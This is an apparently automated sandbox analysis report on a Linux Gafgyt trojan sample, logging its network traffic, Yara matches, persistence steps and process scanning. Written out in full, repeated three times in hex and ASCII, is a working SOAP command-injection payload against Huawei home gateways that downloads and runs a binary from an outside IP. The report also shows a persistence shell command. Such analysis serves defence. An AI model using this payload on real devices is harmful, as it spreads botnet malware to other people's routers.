            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 108.23.15.161
            Source: unknownTCP traffic detected without corresponding DNS query: 41.165.92.99
            Source: unknownTCP traffic detected without corresponding DNS query: 104.153.167.161
            Source: unknownTCP traffic detected without corresponding DNS query: 41.42.145.5
            Source: unknownTCP traffic detected without corresponding DNS query: 41.20.140.65
            Source: unknownTCP traffic detected without corresponding DNS query: 41.64.209.101
            Source: unknownTCP traffic detected without corresponding DNS query: 197.140.236.98
            Source: unknownTCP traffic detected without corresponding DNS query: 157.244.59.153
            Source: unknownTCP traffic detected without corresponding DNS query: 157.97.202.233
            Source: unknownTCP traffic detected without corresponding DNS query: 197.213.2.53
            Source: unknownTCP traffic detected without corresponding DNS query: 41.108.8.168
            Source: unknownTCP traffic detected without corresponding DNS query: 151.205.68.245
            Source: unknownTCP traffic detected without corresponding DNS query: 197.255.112.187
            Source: unknownTCP traffic detected without corresponding DNS query: 157.160.174.21
            Source: unknownTCP traffic detected without corresponding DNS query: 197.253.197.212
            Source: unknownTCP traffic detected without corresponding DNS query: 132.62.148.240
            Source: unknownTCP traffic detected without corresponding DNS query: 12.57.136.99
            Source: unknownTCP traffic detected without corresponding DNS query: 186.31.201.229
            Source: unknownTCP traffic detected without corresponding DNS query: 157.175.42.37
            Source: unknownTCP traffic detected without corresponding DNS query: 197.202.60.226
            Source: unknownTCP traffic detected without corresponding DNS query: 41.64.226.37
            Source: unknownTCP traffic detected without corresponding DNS query: 197.26.253.120
            Source: unknownTCP traffic detected without corresponding DNS query: 197.113.57.36
            Source: unknownTCP traffic detected without corresponding DNS query: 197.82.51.24
            Source: unknownTCP traffic detected without corresponding DNS query: 57.109.182.87
            Source: unknownTCP traffic detected without corresponding DNS query: 197.167.145.206
            Source: unknownTCP traffic detected without corresponding DNS query: 197.227.157.64
            Source: unknownTCP traffic detected without corresponding DNS query: 41.179.174.37
            Source: unknownTCP traffic detected without corresponding DNS query: 197.85.238.20
            Source: unknownTCP traffic detected without corresponding DNS query: 73.165.229.133
            Source: unknownTCP traffic detected without corresponding DNS query: 197.154.6.95
            Source: unknownTCP traffic detected without corresponding DNS query: 41.194.99.37
            Source: unknownTCP traffic detected without corresponding DNS query: 157.166.106.157
            Source: unknownTCP traffic detected without corresponding DNS query: 41.161.169.80
            Source: unknownTCP traffic detected without corresponding DNS query: 41.88.149.180
            Source: unknownTCP traffic detected without corresponding DNS query: 197.25.122.189
            Source: unknownTCP traffic detected without corresponding DNS query: 157.91.173.234
            Source: unknownTCP traffic detected without corresponding DNS query: 157.53.184.138
            Source: unknownTCP traffic detected without corresponding DNS query: 157.26.172.56
            Source: unknownTCP traffic detected without corresponding DNS query: 157.204.227.45
            Source: unknownTCP traffic detected without corresponding DNS query: 157.15.82.229
            Source: unknownTCP traffic detected without corresponding DNS query: 157.251.194.205
            Source: unknownTCP traffic detected without corresponding DNS query: 79.178.176.109
            Source: unknownTCP traffic detected without corresponding DNS query: 197.199.28.116
            Source: unknownTCP traffic detected without corresponding DNS query: 197.255.52.105
            Source: unknownTCP traffic detected without corresponding DNS query: 41.13.33.224
            Source: unknownTCP traffic detected without corresponding DNS query: 41.223.156.180
            Source: unknownTCP traffic detected without corresponding DNS query: 182.83.22.166
            Source: unknownTCP traffic detected without corresponding DNS query: 197.34.53.56
            Source: lD25Z9LfKe.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: lD25Z9LfKe.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownDNS traffic detected: queries for: j.xnyidc.top

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: lD25Z9LfKe.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: lD25Z9LfKe.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6224.1.00007effc4001000.00007effc4011000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: lD25Z9LfKe.elf PID: 6224, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: bin/busybox
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemd
            Source: classification engineClassification label: mal92.troj.linELF@0/0@2/0

            Persistence and Installation Behavior

            barindex
            Sets full permissions to files and/or directories
            Source: /bin/sh (PID: 6231)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
            Source: /bin/sh (PID: 6229)Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6231)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/6236/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1582/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/3088/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/230/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/110/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/231/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/111/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/232/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1579/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/112/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/233/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1699/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/113/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/234/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1335/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1698/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/114/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/235/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1334/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1576/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/2302/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/115/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/236/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/116/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/237/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/117/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/118/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/910/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/119/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/912/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/10/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/2307/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/11/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/918/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/12/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/13/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/14/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/15/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/16/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/17/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/18/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1594/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/120/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/121/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1349/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/122/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/243/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/123/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/2/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/124/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/3/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/4/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/125/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/126/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1344/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1465/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1586/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/127/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/6/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/248/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/128/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/249/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1463/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/800/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/6238/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/9/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/801/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/20/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/21/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1900/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/22/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/23/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/24/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/25/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/26/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/27/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/28/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/29/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/491/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/250/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/130/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/251/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/252/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/132/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/253/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/254/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/255/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/256/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1599/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/257/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1477/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/379/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/258/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1476/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/259/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1475/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/4502/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/936/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/30/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/2208/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/35/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1809/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/1494/cmdline
            Source: /tmp/lD25Z9LfKe.elf (PID: 6234)File opened: /proc/260/cmdline
            Source: /usr/bin/chmod (PID: 6231)File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /tmp/lD25Z9LfKe.elf (PID: 6226)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/lD25Z9LfKe.elf bin/watchdog; chmod 777 bin/watchdog"
            Source: /bin/sh (PID: 6228)Rm executable: /usr/bin/rm -> rm -rf bin/watchdog

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 57718 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 57718
            Source: unknownNetwork traffic detected: HTTP traffic on port 40848 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33038 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35290 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 32970 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 32970
            Source: unknownNetwork traffic detected: HTTP traffic on port 46324 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 42302 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 42302
            Source: unknownNetwork traffic detected: HTTP traffic on port 38528 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 38528
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 45430 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 45430
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 59180 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 52042 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52042
            Source: unknownNetwork traffic detected: HTTP traffic on port 57754 -> 37215
            Source: /tmp/lD25Z9LfKe.elf (PID: 6224)Queries kernel information via 'uname':
            Source: lD25Z9LfKe.elf, 6224.1.0000560cd0f8d000.0000560cd103d000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc11!hotpluggableq
            Source: lD25Z9LfKe.elf, 6224.1.0000560cd0f8d000.0000560cd103d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
            Source: lD25Z9LfKe.elf, 6224.1.00007ffccda8b000.00007ffccdaac000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
